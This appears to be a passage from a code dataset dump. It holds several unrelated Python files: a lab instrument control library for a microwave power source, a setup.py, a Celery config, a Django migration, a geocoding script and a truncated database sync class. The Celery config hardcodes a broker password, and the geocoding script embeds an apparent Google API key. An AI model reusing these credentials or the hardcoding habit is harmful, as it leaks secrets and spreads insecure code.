If delay is None, returns lock delay value\n\n Example::\n\n delay = lockdelay() # Query the Frequency Lock Delay in ms\n\n lockdelay(100) # Set the Frequency Lock Delay to 100 ms\n\n '''\n minDelay = 100.\n maxDelay = 500.\n\n if delay is not None:\n if isinstance(delay,(int,float)):\n if (delay >= minDelay) and (delay <= maxDelay):\n delay = int(delay)\n send_command('lockdelay %i'%delay)\n else:\n raise ValueError('Lock delay must be greater than %i and less than %i ms'%(minDelay,maxDelay))\n else:\n raise ValueError('Lock delay must be int or float')\n else:\n lockReadingString = send_command('lockdelay?',recv = True)\n lockReading = int(lockReadingString)\n return lockReading\n\ndef lockstep(step = None):\n '''Set/Query Lock frequency step in kHz\n\n Args:\n step (None, int, float): Frequency lock step in kHz\n\n Returns:\n stepReading (int): If step is None, returns current lock step value in kHz\n\n Example::\n\n step = lockstep() # Query the Lock Frequency Step in kHz\n\n lockstep(20) # Set the Frequency Lock Step to 20 kHz\n\n '''\n minStep = 10.\n maxStep = 50.\n if step is not None:\n if isinstance(step,(int,float)):\n if (step >= minStep) and (step <= maxStep):\n step = int(step)\n send_command('lockstep %i'%step)\n else:\n raise ValueError('Frequency step must be greater than %i minStep and less than %i maxStep kHz'%(minStep,maxStep))\n else:\n raise ValueError('Frequency step must be float or integer')\n else:\n stepReadingString = send_command('lockstep?',recv = True)\n stepReading = int(stepReadingString)\n\n return stepReading\n\ndef open():\n '''Initialize MPS serial port connection\n '''\n send_command('_init_')\n\n isMPSReady = systemReady()\n\n if (isMPSReady == 1):\n print('System Ready')\n else:\n print('System failed to start')\n\ndef power(powerValue = None):\n '''Set/Query Microwave Power\n\n Args:\n powerValue (None, int, float): Set Power in dBm, by default this parameter is None and the power is queried\n\n Returns:\n powerValue (float): Microwave power in dBm \n\n Example::\n\n powerValue = power() # Query Microwave Power\n\n power(10) # Set microwave power to 10 dBm\n\n '''\n if powerValue is not None:\n if not isinstance(powerValue,(float,int)):\n raise ValueError('Power value must be an float or int')\n powerValue = float(powerValue)\n tenth_dB_power = powerValue * 10.\n str_power = '%0.0f'%tenth_dB_power\n \n send_command('power %s'%str_power)\n\n else: # Query the power\n return_tenth_dB_power = send_command('power?',recv = True)\n return_power = float(return_tenth_dB_power) / 10. # convert to dBm\n return return_power\n\ndef rfstatus(rfState = None,verifyWaveguideStatus = True):\n ''' Set/Query the RF status\n\n +-------+---------------------------------+\n |rfState|Description |\n +=======+=================================+\n |0 |Disable RF Output |\n +-------+---------------------------------+\n |1 |Enable RF Output |\n +-------+---------------------------------+\n |2 |External Trigger Microwave Output|\n +-------+---------------------------------+\n \n Args:\n rfState (None, int): RF Status value\n verifyWaveguideStatus (bool): Check if waveguide status is Enabled (True by default).\n\n Returns:\n rfStateReading (int): If rfStatus is not None, returns queried RF status\n\n Warning:\n The microwave output (rfstatus(1)) can only be enabled if the waveguide switch is set to DNP mode (wgstatus() returns 1).\n \n\n Example::\n\n rfState = rfstatus() # Query the RF State\n\n rfstatus(0) # Disable Microwave Output\n rfstatus(1) # Enable Microwave Output\n rfstatus(2) # Enable External Trigger of Microwave Output\n\n '''\n if rfState is not None:\n if rfState in (0,1,2):\n if verifyWaveguideStatus:\n waveguideState = wgstatus()\n if waveguideState == 1:\n send_command('rfstatus %i'%rfState)\n else:\n raise ValueError('Waveguide Switch is Disabled (EPR Mode)')\n else:\n send_command('rfstatus %i'%rfState)\n else:\n raise ValueError('RF Status Not Valid')\n else:\n rfStateReadingString = send_command('rfstatus?',recv = True)\n rfStateReading = int(rfStateReadingString)\n return rfStateReading\n\ndef rfsweepdata():\n '''Get data from RF sweep\n\n Returns:\n numpy.array: Tuning curve from previous rf sweep\n\n Example::\n\n data = mps.rfsweepdata()\n\n '''\n\n returnDataRfSweep = send_command('rfsweepdata?',recv = True)\n returnDataRfSweep = returnDataRfSweep.rstrip()\n returnDataRfSweep = np.fromstring(returnDataRfSweep,sep=',')\n returnValues = returnDataRfSweep.astype(int)\n\n return returnValues\n\ndef rfsweepdosweep():\n '''Start single RF Sweep.\n\n Example::\n\n mps.rfsweepdosweep()\n\n '''\n\n send_command('rfsweepdosweep?')\n\ndef rfsweeppower(tunePower = None):\n '''Set/Query Power for RF Sweep\n\n Args:\n tunePower (None, float, int): If not None, sets the rf sweep power to this value in dBm. Otherwise queries the current rf sweep power.\n\n Returns:\n float: If tunePower argument is None, the current rf sweep power.\n\n Example::\n \n mps.rfsweeppower(15) # set rf sweep power to 15 dBm\n tunePower = mps.rfsweepPower()\n\n '''\n\n if tunePower is not None:\n if not isinstance(tunePower,(int,float)):\n raise ValueError('Value must be an int or float')\n tunePower = tunePower * 10\n tunePowerString = str(int(tunePower))\n send_command('rfsweeppower %s'%tunePowerString)\n else:\n tunePowerString = send_command('rfsweeppower?', recv = True)\n tunePower = float(tunePowerString) / 10.\n\n return tunePower\n\ndef rfsweepnpts(rfSweepNptsValue = None):\n ''' Set/query number of points in RF sweep\n\n Args:\n rfsweepnpts(int): Set number of points in RF sweep. If empty, number of points is queried\n\n Returns:\n int: If rfSweepNptsValue argument is None, the number of point in the rf sweep\n\n Example::\n \n pts = rfsweepnpts() # query the number of points in rf sweep\n rfsweepnpts(100) # set the number of points in rf sweep to 100\n\n '''\n if rfSweepNptsValue is not None:\n if not isinstance(rfSweepNptsValue,int):\n raise ValueError('Value must be an int')\n send_command('rfsweepnpts %s'%rfSweepNptsValue)\n else: # Query\n returnRfSweepNpts = send_command('rfsweepnpts?',recv = True)\n returnRfSweepNpts = int(returnRfSweepNpts)\n return returnRfSweepNpts\n\ndef rfsweepdwelltime(dwellTime = None):\n '''Rf sweep dwell time in us\n\n Args:\n dwellTime: If dwellTime is not None, value to set the RF sweep dwell time in us\n\n Returns:\n float: If dwellTime is None, the current value of the rf sweep dwell time in us.\n\n Example::\n\n rfsweepdwelltime(50) # set rf sweep dwell time to 50 us\n dwellTime = rfsweepdwelltime() # Query the rf sweep dwell time\n\n '''\n\n if dwellTime is not None:\n if not isinstance(dwellTime,(int,float)):\n raise ValueError('Value must be an int')\n dwellTimeString = str(dwellTime)\n send_command('rfsweepdwelltime %s'%dwellTimeString)\n else:\n dwellTimeString = send_command('rfsweepdwelltime?', recv = True)\n dwellTime = float(dwellTimeString)\n\n return dwellTime\n\ndef rfsweepinitialdwelltime(dwellTime = None):\n '''Rf sweep dwell time in ms for first point\n\n Args:\n dwellTime: If dwellTime is not None, value to set the RF sweep dwell time for the first point in ms\n\n Returns:\n float: If dwellTime is None, the current value of the RF sweep dwell time for the first point in ms.\n\n Example::\n\n mps.rfsweepinitialdwelltime(100) # Set the dwell time for the first point to 100 ms\n dwellTime = mps.rfsweepinitialdwelltime() # Query the dwell time for the first point in ms\n\n '''\n\n if dwellTime is not None:\n if not isinstance(dwellTime,(int,float)):\n raise ValueError('Value must be an int')\n dwellTimeString = str(dwellTime)\n send_command('rfsweepinitialdwelltime %s'%dwellTimeString)\n else:\n dwellTimeString = send_command('rfsweepinitialdwelltime?', recv = True)\n dwellTime = float(dwellTimeString)\n\n return dwellTime\n\ndef rfsweepsw(rfSweepSwValue = None):\n ''' Set/query predefined RF sweep width (MHs)\n\n +-----------+----------------------------+\n | rfsweepsw | Value |\n +===========+============================+\n | 0 | 250 MHz |\n +-----------+----------------------------+\n | 1 | 100 MHz |\n +-----------+----------------------------+\n | 2 | 50 MHz |\n +-----------+----------------------------+\n | 3 | 10 MHz |\n +-----------+----------------------------+\n\n Args:\n rfsweepsw(int): rfsweepsw variable which determines the rf sweep width. If None, number of points is queried\n\n Returns:\n int: rf sweep width\n\n Example::\n\n mps.rfsweepsw(0) # set rf sweep width to 250 MHz\n sweepWidth = mps.rfsweepsw() # Query current rf sweep width\n\n '''\n\n if rfSweepSwValue is not None:\n if not isinstance(rfSweepSwValue,int):\n raise ValueError('Value must be an int')\n send_command('rfsweepsw %s'%rfSweepSwValue)\n else: # Query\n returnRfSweepSw = send_command('rfsweepsw?',recv = True)\n returnRfSweepSw = int(returnRfSweepSw)\n return returnRfSweepSw\n\ndef rxdiodesn():\n '''Query serial number of Rx diode\n\n Returns:\n serialNumberRx (str): Serial number string of Rx diode\n '''\n serialNumberRx = send_command('rxdiodesn?',recv = True)\n return serialNumberRx\n\ndef rxpowerdbm():\n '''Query the Rx diode reading in dBm\n\n Returns:\n rxPower (float): Reciever monitor power reading in dBm\n\n Example::\n\n rxPower = rxpowerdbm() # Query Rx diode power reading\n\n '''\n return_tenth_rx_dbm = send_command('rxpowerdbm?',recv = True)\n rxPower = float(return_tenth_rx_dbm) / 10. # convert to dBm\n return rxPower\n\ndef rxpowermv():\n '''Query the Rx diode reading in mV\n\n Returns:\n rxVoltage (float): Receiver monitor voltage reading in mV\n\n Example::\n\n rxVoltage = rxpowermv() # Query Rx diode voltage\n\n '''\n return_tenth_rx_mv = send_command('rxpowermv?',recv = True)\n rxVoltage = float(return_tenth_rx_mv) / 10. # convert to mV\n return rxVoltage\n\ndef screen(screenState = None):\n '''Set/Query Screen Status\n\n +--------------+----------------+\n | screen | Description |\n +==============+================+\n | 0 | Main Screen |\n +--------------+----------------+\n | 1 | Operate Screen |\n +--------------+----------------+\n | 2 | Sweep Screen |\n +--------------+----------------+\n | 3 | Advanced Screen|\n +--------------+----------------+\n\n Args:\n screenState (None, int): If screenState is not None, sets the screen state\n\n Returns:\n screenStateReading (int): If screenState is None, returns the screen state\n\n Example::\n\n screenState = screen() # Query the Screen Status\n\n screenstatus(0) # Set Screen to Main Screen\n screenstatus(1) # Set Screen to Operate Screen\n screenstatus(2) # Set Screen to Sweep Screen\n screenstatus(3) # Set Screen to Advanced Screen\n\n '''\n\n if screenState is not None:\n if screenState in (0,1,2):\n send_command('screen %i'%screenState)\n else:\n raise ValueError('Screen Status is not Valid')\n else:\n screenStateReadingString = send_command('screen?',recv = True)\n screenStateReading = int(screenStateReadingString)\n return screenStateReading\n\ndef send_command(command, recv = False):\n '''Send string command to python MPS server\n\n Args:\n command (str): string command to be sent to MPS Server\n recv (bool): True if serial port should be read after writing. False by default.\n\n Returns:\n recv_string (str): if recv = True, returns string received from MPS Server\n\n Example::\n\n send_command('freq 9300000') # Set Frequency to 9.3 GHz\n\n freqStringkHz = send_command('freq?',recv = True) # Query the microwave frequency in kHz\n freqValue = float(freqStringkHz) / 1.e6 # Convert frequency string float in units of GHz\n\n send_command('_stop_') # Stop the python server\n\n '''\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((HOST,PORT))\n\n send_string = '%s\\n'%command\n\n # specify string as utf-8\n send_bytes = send_string.encode('utf-8')\n\n # send bytes to server\n s.sendall(send_bytes)\n\n # serial delay\n time.sleep(serialDelay)\n\n if recv:\n recv_bytes = s.recv(1024)\n recv_string = recv_bytes.decode('utf-8')\n recv_string = recv_string.rstrip()\n\n s.close()\n\n return recv_string\n else:\n s.close()\n\ndef serialNumber():\n '''Query serial number of MPS\n\n Returns:\n serialNumber (str): Serial number string of MPS\n '''\n serialNumberString = send_command('serial?',recv = True)\n return serialNumberString\n\ndef set_host(host):\n global HOST\n HOST = host\n\ndef set_port(port):\n global PORT\n PORT = port\n\ndef start(serialPort = None, host = None, port = None, debug = False):\n\n '''Start python TCP server\n\n Args:\n serialPort (None, str): If given, serial port to establish MPS connection.\n ip (None, str): If given, the IP address to use for the server\n port (None, str); If given, the port to use for the server\n\n Example::\n\n start() # Start python server with automatically detected serial port or default serial port (defined in configuration file)\n\n start('COM5') # Start python server using \"COM5\" as serial port\n '''\n # Need HOST and PORT to be global\n global HOST\n global PORT\n\n args = []\n if serialPort is not None:\n args += [serialPort]\n elif autoDetectSerialPort:\n serialPort = detectMPSSerialPort()\n if serialPort == None:\n print('\\nCannot automatically connect to MPS.\\nPlease specify COM Port manually.')\n return\n args += [serialPort]\n\n if host is None:\n host = HOST\n args += [host]\n\n if port is None:\n port = PORT\n args += [str(port)]\n \n HOST = host\n PORT = port\n print()\n print('--- Server Parameters ---')\n print('Serial Port: %s'%serialPort)\n print('HOST: %s'%host)\n print('PORT: %s'%port)\n print('-------------------------')\n print()\n\n if debug == True:\n print('Starting Subprocess')\n if os.name == 'nt':\n p = subprocess.Popen([sys.executable, '-m', 'pyB12MPS'] + args, \n stdout=subprocess.PIPE, \n stderr=subprocess.STDOUT,\n shell = True,\n creationflags = subprocess.DETACHED_PROCESS)\n else:\n p = subprocess.Popen([sys.executable, '-m', 'pyB12MPS'] + args, \n stdout=subprocess.PIPE,\n start_new_session = True)\n\n else:\n if os.name == 'nt':\n p = subprocess.Popen([sys.executable, '-m', 'pyB12MPS'] + args, \n stdout=subprocess.PIPE, \n stderr=subprocess.STDOUT)\n else:\n p = subprocess.Popen([sys.executable, '-m', 'pyB12MPS'] + args, \n stdout=subprocess.PIPE)\n \n print('Server starting...')\n\n serverErrorIndicator = test()\n errorCounter = 0\n\n while (serverErrorIndicator != 0):\n \n time.sleep(1.)\n serverErrorIndicator = test()\n print('Server Error Code: %s'%serverErrorIndicator)\n errorCounter += 1\n\n if (p.poll() is not None) or (errorCounter >= 5):\n print()\n print('Server failed to start.')\n print()\n print('Please visit the Troubleshooting section of the ')\n print('online documentation at pyB12MPS.bridge12.com for')\n print('more information.')\n print()\n return\n\n if serverErrorIndicator == 0:\n print('Server started.')\n\n print('MPS initializing...')\n\n ### Check for MPS Initialization ###\n if initializeOnStart:\n open()\n\ndef stop():\n '''Stop python server \n '''\n send_command('_stop_')\n\n serverErrorIndicator = test()\n errorCounter = 0\n\n while (serverErrorIndicator == 0):\n time.sleep(0.1)\n serverErrorIndicator = test()\n errorCounter += 1\n\n if (errorCounter >= 50):\n print('Failed to stop server.')\n break\n\n if serverErrorIndicator != 0:\n print('Server stopped.')\n\ndef systemReady():\n '''Query python server for initialized status of MPS\n\n +-----------+--------------------------------------+\n |isMPSReady |Description |\n +===========+======================================+\n |0 |MPS Serial Connection Not Initialized |\n +-----------+--------------------------------------+\n |1 |MPS Serial Connection Initialized |\n +-----------+--------------------------------------+\n \n Returns:\n isMPSReady (int): RF Status value\n '''\n isMPSReady = send_command('_is_system_ready_',recv = True)\n isMPSReady = int(isMPSReady.rstrip())\n return isMPSReady\n\ndef systemstatus():\n '''Returns dictionary of MPS status\n\n +--------------------------------------+\n |Keys |\n +======================================+\n |freq |\n +--------------------------------------+\n |power |\n +--------------------------------------+\n |rxpowermv |\n +--------------------------------------+\n |txpowermv |\n +--------------------------------------+\n |rfstatus |\n +--------------------------------------+\n |wgstatus |\n +--------------------------------------+\n |ampstatus |\n +--------------------------------------+\n |amptemp |\n +--------------------------------------+\n |lockstatus |\n +--------------------------------------+\n |screen |\n +--------------------------------------+\n\n\n Returns:\n dict: dictionary of system status variables\n '''\n systemStatusString = send_command('systemstatus?',recv = True)\n\n systemStatusList = systemStatusString.rstrip().split(',')\n\n systemStatusDict = {}\n\n for statusInfo in systemStatusList:\n key, value = tuple(statusInfo.split(':'))\n\n systemStatusDict[key] = value\n\n systemStatusDict['freq'] = float(systemStatusDict['freq']) / 1.e6\n systemStatusDict['power'] = float(systemStatusDict['power']) / 10.\n systemStatusDict['rxpowermv'] = float(systemStatusDict['rxpowermv']) / 10.\n systemStatusDict['txpowermv'] = float(systemStatusDict['txpowermv']) / 10.\n systemStatusDict['rfstatus'] = int(systemStatusDict['rfstatus'])\n systemStatusDict['wgstatus'] = int(systemStatusDict['wgstatus'])\n systemStatusDict['ampstatus'] = int(systemStatusDict['ampstatus'])\n systemStatusDict['amptemp'] = float(systemStatusDict['amptemp']) / 10.\n systemStatusDict['lockstatus'] = int(systemStatusDict['lockstatus'])\n systemStatusDict['screen'] = int(systemStatusDict['screen'])\n\n return systemStatusDict\n\ndef test():\n '''Test Server Connection\n\n Returns:\n serverErrorIndicator: A value of zero (0) indicates normal operation of the server. Any other value indicates a server error.\n '''\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n serverErrorIndicator = s.connect_ex((HOST,PORT))\n s.close()\n return serverErrorIndicator\n\ndef trig():\n '''Output Trigger pulse from MPS\n\n Example::\n\n trig()\n\n '''\n send_command('trig')\n\ndef triglength(length = None):\n '''Set/Query trigger pulse length in us\n\n Args:\n length (None, float, int): If given, the length of the trigger pulse in us. If None, queries the trigger pulse length.\n\n Returns:\n (int) trigger pulse length in us.\n\n Example::\n\n triglength(100) # Set trigger pulse length to 100 us\n triglength() # query the trigger pulse length\n\n '''\n if length is None:\n length = send_command('triglength?', recv = True)\n length = int(length)\n return length\n else:\n if (length > 0) and (length <= 10000000):\n send_command('triglength %i'%length)\n else:\n raise ValueError('Trigger Length must be less than or equal to 10 seconds.')\n\ndef txdiodesn():\n '''Query serial number of Tx diode\n \n Returns:\n serialNumberTx (str): Serial number string of Tx diode\n '''\n serialNumberTx = send_command('txdiodesn?',recv = True)\n return serialNumberTx\n\ndef txpowerdbm():\n ''' Returns transmitter power monitor in dBm\n\n Returns:\n txPower (float): Transmitter power monitor voltage in dBm\n\n Example::\n\n txPower = txpowerdbm() # Query Tx diode power reading\n\n '''\n return_tenth_tx_dbm = send_command('txpowerdbm?',recv = True)\n txPower = float(return_tenth_tx_dbm) / 10. # convert to dBm\n return txPower\n\ndef txpowermv():\n ''' Returns transmitter power monitor in mV\n\n Returns:\n txVoltage (float): Transmitter power monitor voltage in mV\n\n Example::\n\n txVoltage = txpowermv() # Query Tx diode voltage\n\n '''\n return_tenth_tx_mv = send_command('txpowermv?',recv = True)\n txVoltage = float(return_tenth_tx_mv) / 10. # convert to mV\n return txVoltage\n\ndef wgstatus(wgStatus = None):\n ''' Set/Query the waveguide switch (wg) status\n\n +--------+-----------------------------------+\n |wgStatus|Description |\n +========+===================================+\n |0 |Disable Waveguide Switch (EPR Mode)|\n +--------+-----------------------------------+\n |1 |Enable Waveguide Switch (DNP Mode) |\n +--------+-----------------------------------+\n\n Args:\n wgStatus (None, int): wg status value\n\n Returns:\n wgStatusReading (int): If wgStatus is not None, returns queried wg status\n\n Example::\n\n wgState = wgstatus() # Query the Waveguide State\n\n wgstatus(0) # Switch to EPR Mode\n wgstatus(1) # Switch to DNP Mode\n\n '''\n if wgStatus is not None:\n if wgStatus in (0,1):\n send_command('wgstatus %i'%wgStatus)\n else:\n raise ValueError('WG Status Not Valid')\n else:\n wgStatusReadingString = send_command('wgstatus?',recv = True)\n wgStatusReading = int(wgStatusReadingString)\n return wgStatusReading\n\nif __name__ == '__main__':\n pass\n", "sub_path": "pyB12MPS/pyB12MPS.py", "file_name": "pyB12MPS.py", "file_ext": "py", "file_size_in_byte": 31828, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "serial.tools.list_ports.tools.list_ports.comports", "line_number": 127, "usage_type": "call"}, {"api_name": "serial.tools.list_ports.tools", "line_number": 127, "usage_type": "attribute"}, {"api_name": "serial.tools.list_ports", "line_number": 127, "usage_type": "name"}, {"api_name": "serial.tools.list_ports.tools.list_ports.comports", "line_number": 220, "usage_type": "call"}, {"api_name": "serial.tools.list_ports.tools", "line_number": 220, "usage_type": "attribute"}, {"api_name": "serial.tools.list_ports", "line_number": 220, "usage_type": "name"}, {"api_name": "numpy.fromstring", "line_number": 450, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 710, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 710, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 710, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 722, "usage_type": "call"}, {"api_name": "os.name", "line_number": 801, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 802, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 802, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 803, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 804, "usage_type": "attribute"}, {"api_name": "subprocess.DETACHED_PROCESS", "line_number": 806, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 808, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 808, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 809, "usage_type": "attribute"}, {"api_name": "os.name", "line_number": 813, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 814, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 814, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 815, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 816, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 818, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 818, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 819, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 828, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 861, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 951, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 951, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 951, "usage_type": "attribute"}]} +{"seq_id": "604652", "text": "from setuptools import setup, find_packages\n\n\ndef parse_requirements(filename):\n \"\"\"\n load requirements from a pip requirements file\n \"\"\"\n lineiter = (line.strip() for line in open(filename))\n return [line for line in lineiter if line and not line.startswith(\"#\")]\n\nreqs = parse_requirements('requirements.txt')\n\nsetup(name='pyx_%name%_pytorch',\n version='0.0.1',\n description='PYX module',\n url='',\n author='PYX Team',\n author_email='support@pyx.ai',\n packages=find_packages(),\n install_requires=reqs,\n zip_safe=False)\n", "sub_path": "pyx_cli/boilerplates/general/pytorch/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 575, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "setuptools.setup", "line_number": 13, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "199472840", "text": "from celery import Celery\nfrom untitled.app.utils import get_plugins_modules\n\n# celery -A untitled.app.workflow_manager.celery_workflow_manager worker --pool=eventlet --loglevel=info\n\napp = Celery('app',\n broker='amqp://willian:0502@localhost/wvhost',\n backend='amqp://willian:0502@localhost/wvhost',\n include=['untitled.app.workflow_manager.celery_workflow_manager'])\n\n# Optional configuration, see the application user guide.\n\napp.conf.update(\n result_expires=3600,\n)\n\nif __name__ == '__main__':\n app.start()\n", "sub_path": "untitled/app/workflow_manager/celery.py", "file_name": "celery.py", "file_ext": "py", "file_size_in_byte": 554, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "celery.Celery", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "167892148", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Picture',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('file', models.ImageField(upload_to='')),\n ('title', models.CharField(max_length=100)),\n ('size', models.IntegerField(default=0)),\n ('loaded', models.DateTimeField()),\n ],\n ),\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ],\n ),\n migrations.CreateModel(\n name='UserInform',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('name', models.CharField(default='', max_length=100)),\n ('password', models.CharField(default='', max_length=100)),\n ],\n ),\n migrations.AddField(\n model_name='user',\n name='userInform',\n field=models.ForeignKey(to='lookat.UserInform'),\n ),\n migrations.AddField(\n model_name='picture',\n name='user',\n field=models.ForeignKey(to='lookat.User'),\n ),\n ]\n", "sub_path": "picturehosting/lookat/migrations/0001_initial.py", "file_name": "0001_initial.py", "file_ext": "py", "file_size_in_byte": 1562, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 33, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 37, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 42, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 45, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "213544281", "text": "import requests\n\nresponse = requests.get('https://maps.googleapis.com/maps/api/geocode/json?address=AMI Stadium&key=AIzaSyD3QNXpAktAJq6pH_vqOU0-2bHJWEAFOAo')\n\n\n# In[62]:\n\n\ndata = response.json()\n\n\n# In[63]:\n\n\ndata\n\n\n# In[15]:\n\n\nprint(type(data))\n\n\n# In[16]:\n\n\ndata.items()\n\n\n# In[17]:\n\n\ndict.keys()\n\n\n# In[22]:\n\n\ndata.keys()\n\n\n# In[21]:\n\n\ndata['results'][0]\n\n\n# In[23]:\n\n\ndata.keys()\n\n\n# In[30]:\n\n\ntype(data['results'])\n\n\n# In[49]:\n\n\ndata['results'][0]['address_components'][0]['long_name']\n\n\n# In[50]:\n\n\ndata['results'][0]['address_components'][1]['long_name']\n\n\n# In[51]:\n\n\ndata['results'][0]['address_components'][2]['long_name']\n\n", "sub_path": "Automation/scrapy-project/cricket_stadium/read_data_geocoding_api.py", "file_name": "read_data_geocoding_api.py", "file_ext": "py", "file_size_in_byte": 634, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "306066456", "text": "from const import const\nimport threading\nimport logging\nfrom Utils.Helper import *\n\n\nclass BaseModel(threading.Thread):\n def __init__(self, mapping):\n super(BaseModel, self).__init__()\n self.mapping = mapping\n logging.basicConfig(filename='pvn.log', level=logging.ERROR, format=\"%(asctime)s - %(message)s\",\n datefmt=\"%Y/%m/%d %H:%M:%S\")\n\n def insert_into_oracle(self, fields_mapping, key_field='id', m_dates=None, m_fmap=None, lob_fields=None, del_fields=None):\n with OracleInstance(**const.ORACLE_DB, dict_result=False) as db:\n last_timestamp = db.query_one(\"SELECT max(update_time) FROM {}\".format(self.mapping[1]))[0]\n if last_timestamp:\n # 如果存在历史数据每次添加增量\n self.update(last_timestamp, fields_mapping, key_field, m_dates, m_fmap, lob_fields, del_fields)\n else:\n # 如果不存在历史数据直接全选更新\n self.init(fields_mapping, key_field, m_dates, m_fmap, lob_fields, del_fields)\n\n def init(self, fields_mapping, key_field, m_dates, m_fmap, lob_fields, del_fields):\n print('init {}'.format(self.mapping[1]))\n select_sql = \"SELECT * FROM {} ORDER BY updatetime\".format(self.mapping[0])\n with MySQLInstance(**const.MYSQL_DB, dict_result=1) as mdb:\n mdb.execute(select_sql)\n paras = mdb.query_one()\n with OracleInstance(**const.ORACLE_DB, dict_result=True) as odb:\n i = 1\n while paras:\n insert_sql = format_insert_sql(self.mapping[1], fields_mapping, m_fmap)\n paras = format_paras(paras, m_dates, m_fmap, del_fields)\n try:\n # print(\"{} --- {}\".format(i, paras[key_field]))\n odb.execute_with_clob(insert_sql, lob_fields, params=paras)\n except Exception as e:\n logging.error(\"{}.{}\".format(self.mapping[1], paras[key_field]))\n logging.exception(e)\n if i & 0b100000000000000:\n odb.commit()\n i = 0\n i = i + 1\n paras = mdb.query_one()\n odb.commit()\n print('init {} complete'.format(self.mapping[1]))\n\n def 